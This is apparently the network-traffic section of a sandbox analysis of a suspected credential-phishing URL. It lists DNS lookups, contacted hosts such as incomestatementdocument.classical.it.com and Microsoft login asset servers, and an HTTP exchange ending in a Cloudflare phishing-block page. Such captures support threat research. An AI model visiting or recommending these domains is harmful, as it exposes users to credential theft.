                                                                                        Mar 20, 2025 18:48:06.501233101 CET5947153192.168.2.161.1.1.1
                                                                                        Mar 20, 2025 18:48:06.501360893 CET5910053192.168.2.161.1.1.1
                                                                                        Mar 20, 2025 18:48:06.607057095 CET53591001.1.1.1192.168.2.16
                                                                                        Mar 20, 2025 18:48:06.609266996 CET53594711.1.1.1192.168.2.16
                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                        Mar 20, 2025 18:47:55.346671104 CET192.168.2.161.1.1.1c24b(Port unreachable)Destination Unreachable
                                                                                        Mar 20, 2025 18:48:06.019140005 CET192.168.2.161.1.1.1c2ad(Port unreachable)Destination Unreachable
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Mar 20, 2025 18:46:23.877377987 CET192.168.2.161.1.1.10x6055Standard query (0)incomestatementdocument.classical.it.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:23.879129887 CET192.168.2.161.1.1.10xa044Standard query (0)incomestatementdocument.classical.it.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:24.477133036 CET192.168.2.161.1.1.10x2b0dStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:24.477426052 CET192.168.2.161.1.1.10x8861Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:25.204941034 CET192.168.2.161.1.1.10x8babStandard query (0)incomestatementdocument.classical.it.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:25.205225945 CET192.168.2.161.1.1.10x801fStandard query (0)incomestatementdocument.classical.it.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:27.944526911 CET192.168.2.161.1.1.10x8612Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:27.944637060 CET192.168.2.161.1.1.10x536Standard query (0)www.google.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:36.474741936 CET192.168.2.161.1.1.10x99cdStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:36.475054979 CET192.168.2.161.1.1.10xeaacStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:36.477981091 CET192.168.2.161.1.1.10x61a3Standard query (0)mailmeteor.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:36.478137970 CET192.168.2.161.1.1.10x8e8dStandard query (0)mailmeteor.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:37.142913103 CET192.168.2.161.1.1.10xebd3Standard query (0)mailmeteor.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:37.143116951 CET192.168.2.161.1.1.10x7c1aStandard query (0)mailmeteor.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:38.180330038 CET192.168.2.161.1.1.10x378fStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:38.180387020 CET192.168.2.161.1.1.10xaa69Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:39.313868046 CET192.168.2.161.1.1.10xe26Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:39.314069033 CET192.168.2.161.1.1.10xe9d7Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:50.767205954 CET192.168.2.161.1.1.10x57e9Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:50.767390013 CET192.168.2.161.1.1.10xfff1Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:51.608191013 CET192.168.2.161.1.1.10xd1Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:51.608364105 CET192.168.2.161.1.1.10x3b9fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.130426884 CET192.168.2.161.1.1.10xf2e0Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.130768061 CET192.168.2.161.1.1.10xd675Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.131217003 CET192.168.2.161.1.1.10x5586Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.131417036 CET192.168.2.161.1.1.10xa465Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.131836891 CET192.168.2.161.1.1.10xdf86Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.132011890 CET192.168.2.161.1.1.10x31daStandard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.133538008 CET192.168.2.161.1.1.10x5b4Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.133688927 CET192.168.2.161.1.1.10xc502Standard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.134574890 CET192.168.2.161.1.1.10xe140Standard query (0)6438955191-1317754460.cos.ap-tokyo.myqcloud.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.134742022 CET192.168.2.161.1.1.10x9ad0Standard query (0)6438955191-1317754460.cos.ap-tokyo.myqcloud.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:57.810012102 CET192.168.2.161.1.1.10x4ee3Standard query (0)xzoe.classical.it.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:57.810162067 CET192.168.2.161.1.1.10x7104Standard query (0)xzoe.classical.it.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:57.812093019 CET192.168.2.161.1.1.10xc0b9Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:57.812427044 CET192.168.2.161.1.1.10x684dStandard query (0)res.cloudinary.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:58.637226105 CET192.168.2.161.1.1.10x44b0Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:58.637625933 CET192.168.2.161.1.1.10x8fbeStandard query (0)res.cloudinary.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:02.805280924 CET192.168.2.161.1.1.10x6390Standard query (0)xzoe.classical.it.comA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:02.805424929 CET192.168.2.161.1.1.10x8a5cStandard query (0)xzoe.classical.it.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:05.831037998 CET192.168.2.161.1.1.10xf9e7Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:05.831399918 CET192.168.2.161.1.1.10x321fStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:06.501233101 CET192.168.2.161.1.1.10xe9a3Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:06.501360893 CET192.168.2.161.1.1.10x60f0Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Mar 20, 2025 18:46:23.994872093 CET1.1.1.1192.168.2.160xa044No error (0)incomestatementdocument.classical.it.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:23.995440006 CET1.1.1.1192.168.2.160x6055No error (0)incomestatementdocument.classical.it.com172.67.216.207A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:23.995440006 CET1.1.1.1192.168.2.160x6055No error (0)incomestatementdocument.classical.it.com104.21.24.46A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:24.585470915 CET1.1.1.1192.168.2.160x2b0dNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:25.315830946 CET1.1.1.1192.168.2.160x8babNo error (0)incomestatementdocument.classical.it.com172.67.216.207A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:25.315830946 CET1.1.1.1192.168.2.160x8babNo error (0)incomestatementdocument.classical.it.com104.21.24.46A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:25.317500114 CET1.1.1.1192.168.2.160x801fNo error (0)incomestatementdocument.classical.it.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:28.053801060 CET1.1.1.1192.168.2.160x536No error (0)www.google.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:28.055424929 CET1.1.1.1192.168.2.160x8612No error (0)www.google.com142.250.80.100A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:36.586940050 CET1.1.1.1192.168.2.160xeaacNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:36.588584900 CET1.1.1.1192.168.2.160x99cdNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:36.588584900 CET1.1.1.1192.168.2.160x99cdNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:36.590461016 CET1.1.1.1192.168.2.160x8e8dNo error (0)mailmeteor.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:36.638334990 CET1.1.1.1192.168.2.160x61a3No error (0)mailmeteor.com172.67.187.19A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:36.638334990 CET1.1.1.1192.168.2.160x61a3No error (0)mailmeteor.com104.21.92.58A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:37.252963066 CET1.1.1.1192.168.2.160x7c1aNo error (0)mailmeteor.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:37.259754896 CET1.1.1.1192.168.2.160xebd3No error (0)mailmeteor.com104.21.92.58A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:37.259754896 CET1.1.1.1192.168.2.160xebd3No error (0)mailmeteor.com172.67.187.19A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:38.287946939 CET1.1.1.1192.168.2.160x378fNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:38.287946939 CET1.1.1.1192.168.2.160x378fNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:38.288085938 CET1.1.1.1192.168.2.160xaa69No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:39.419802904 CET1.1.1.1192.168.2.160xe26No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:39.419802904 CET1.1.1.1192.168.2.160xe26No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:46:39.421278000 CET1.1.1.1192.168.2.160xe9d7No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:50.874602079 CET1.1.1.1192.168.2.160x57e9No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:50.874602079 CET1.1.1.1192.168.2.160x57e9No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:50.875942945 CET1.1.1.1192.168.2.160xfff1No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:51.712280035 CET1.1.1.1192.168.2.160x3b9fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:51.715662956 CET1.1.1.1192.168.2.160xd1No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:51.715662956 CET1.1.1.1192.168.2.160xd1No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.235327959 CET1.1.1.1192.168.2.160xa465No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.237036943 CET1.1.1.1192.168.2.160xf2e0No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.237036943 CET1.1.1.1192.168.2.160xf2e0No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.237036943 CET1.1.1.1192.168.2.160xf2e0No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.237036943 CET1.1.1.1192.168.2.160xf2e0No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.237090111 CET1.1.1.1192.168.2.160x5586No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.237090111 CET1.1.1.1192.168.2.160x5586No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.237355947 CET1.1.1.1192.168.2.160xc502No error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.237715006 CET1.1.1.1192.168.2.160xdf86No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.237715006 CET1.1.1.1192.168.2.160xdf86No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.237807989 CET1.1.1.1192.168.2.160x31daNo error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.238080978 CET1.1.1.1192.168.2.160x5b4No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:54.238080978 CET1.1.1.1192.168.2.160x5b4No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:55.053729057 CET1.1.1.1192.168.2.160xe140No error (0)6438955191-1317754460.cos.ap-tokyo.myqcloud.comcos.ap-tokyo.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:55.053729057 CET1.1.1.1192.168.2.160xe140No error (0)cos.ap-tokyo.myqcloud.com43.128.240.48A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:55.053729057 CET1.1.1.1192.168.2.160xe140No error (0)cos.ap-tokyo.myqcloud.com43.128.240.50A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:57.920785904 CET1.1.1.1192.168.2.160xc0b9No error (0)res.cloudinary.comion.cloudinary.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:57.920785904 CET1.1.1.1192.168.2.160xc0b9No error (0)ion.cloudinary.com.edgekey.nete1315.dsca.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:57.920785904 CET1.1.1.1192.168.2.160xc0b9No error (0)e1315.dsca.akamaiedge.net23.56.162.51A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:57.920860052 CET1.1.1.1192.168.2.160x684dNo error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:57.939841986 CET1.1.1.1192.168.2.160x7104No error (0)xzoe.classical.it.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:57.949768066 CET1.1.1.1192.168.2.160x4ee3No error (0)xzoe.classical.it.com104.21.24.46A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:57.949768066 CET1.1.1.1192.168.2.160x4ee3No error (0)xzoe.classical.it.com172.67.216.207A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:58.747330904 CET1.1.1.1192.168.2.160x44b0No error (0)res.cloudinary.comion.cloudinary.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:58.747330904 CET1.1.1.1192.168.2.160x44b0No error (0)ion.cloudinary.com.edgekey.nete1315.dsca.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:58.747330904 CET1.1.1.1192.168.2.160x44b0No error (0)e1315.dsca.akamaiedge.net23.56.162.51A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:47:58.749696016 CET1.1.1.1192.168.2.160x8fbeNo error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:02.919557095 CET1.1.1.1192.168.2.160x8a5cNo error (0)xzoe.classical.it.com65IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:02.926920891 CET1.1.1.1192.168.2.160x6390No error (0)xzoe.classical.it.com172.67.216.207A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:02.926920891 CET1.1.1.1192.168.2.160x6390No error (0)xzoe.classical.it.com104.21.24.46A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:05.946054935 CET1.1.1.1192.168.2.160xee2fNo error (0)shed.dual-low.s-part-0012.t-0009.t-msedge.nets-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:05.946054935 CET1.1.1.1192.168.2.160xee2fNo error (0)s-part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:05.952059984 CET1.1.1.1192.168.2.160xf9e7No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:05.952059984 CET1.1.1.1192.168.2.160xf9e7No error (0)www.tm.aadcdn.msftauth.akadns.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:05.952059984 CET1.1.1.1192.168.2.160xf9e7No error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:05.952059984 CET1.1.1.1192.168.2.160xf9e7No error (0)e329293.dscd.akamaiedge.net23.209.72.31A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:05.952059984 CET1.1.1.1192.168.2.160xf9e7No error (0)e329293.dscd.akamaiedge.net23.209.72.9A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:06.018953085 CET1.1.1.1192.168.2.160x321fNo error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:06.018953085 CET1.1.1.1192.168.2.160x321fNo error (0)www.tm.aadcdn.msftauth.akadns.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:06.018953085 CET1.1.1.1192.168.2.160x321fNo error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:06.578588009 CET1.1.1.1192.168.2.160xb5bfNo error (0)shed.dual-low.s-part-0010.t-0009.t-msedge.nets-part-0010.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:06.578588009 CET1.1.1.1192.168.2.160xb5bfNo error (0)s-part-0010.t-0009.t-msedge.net13.107.246.38A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:06.607057095 CET1.1.1.1192.168.2.160x60f0No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:06.607057095 CET1.1.1.1192.168.2.160x60f0No error (0)www.tm.aadcdn.msftauth.trafficmanager.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:06.607057095 CET1.1.1.1192.168.2.160x60f0No error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:06.609266996 CET1.1.1.1192.168.2.160xe9a3No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:06.609266996 CET1.1.1.1192.168.2.160xe9a3No error (0)www.tm.aadcdn.msftauth.akadns.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:06.609266996 CET1.1.1.1192.168.2.160xe9a3No error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:06.609266996 CET1.1.1.1192.168.2.160xe9a3No error (0)e329293.dscd.akamaiedge.net23.209.72.9A (IP address)IN (0x0001)false
                                                                                        Mar 20, 2025 18:48:06.609266996 CET1.1.1.1192.168.2.160xe9a3No error (0)e329293.dscd.akamaiedge.net23.209.72.31A (IP address)IN (0x0001)false
                                                                                        • incomestatementdocument.classical.it.com
                                                                                          • challenges.cloudflare.com
                                                                                          • mailmeteor.com
                                                                                          • cdnjs.cloudflare.com
                                                                                          • code.jquery.com
                                                                                          • maxcdn.bootstrapcdn.com
                                                                                          • stackpath.bootstrapcdn.com
                                                                                          • 6438955191-1317754460.cos.ap-tokyo.myqcloud.com
                                                                                          • xzoe.classical.it.com
                                                                                          • res.cloudinary.com
                                                                                          • aadcdn.msftauth.net
                                                                                        • a.nel.cloudflare.com
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.1649704172.67.216.2074436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:24 UTC696OUTGET /NC6tS/ HTTP/1.1
                                                                                        Host: incomestatementdocument.classical.it.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:24 UTC592INHTTP/1.1 403 Forbidden
                                                                                        Date: Thu, 20 Mar 2025 17:46:24 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2B2PAc8XzhPotqxNVd624znGEyTjTbFO2fl%2FTLIaQkUMEuWBr3MtXwQa%2FtGbKn%2BzZ6K7NKHVSqb1ZPeQ%2Bq4BMonzjYF9WL24hk8sIPPwAvfxCLl5OyIQED%2B%2FgNjyvhdjgVo3vBkGBFhUWFVbcQZOHD7ayRirvEIAR9QC"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9237075e9ac34fb3-EWR
                                                                                        2025-03-20 17:46:24 UTC777INData Raw: 31 31 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                        Data Ascii: 11c6<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                        2025-03-20 17:46:24 UTC1369INData Raw: 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72
                                                                                        Data Ascii: 'cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var
                                                                                        2025-03-20 17:46:24 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a>
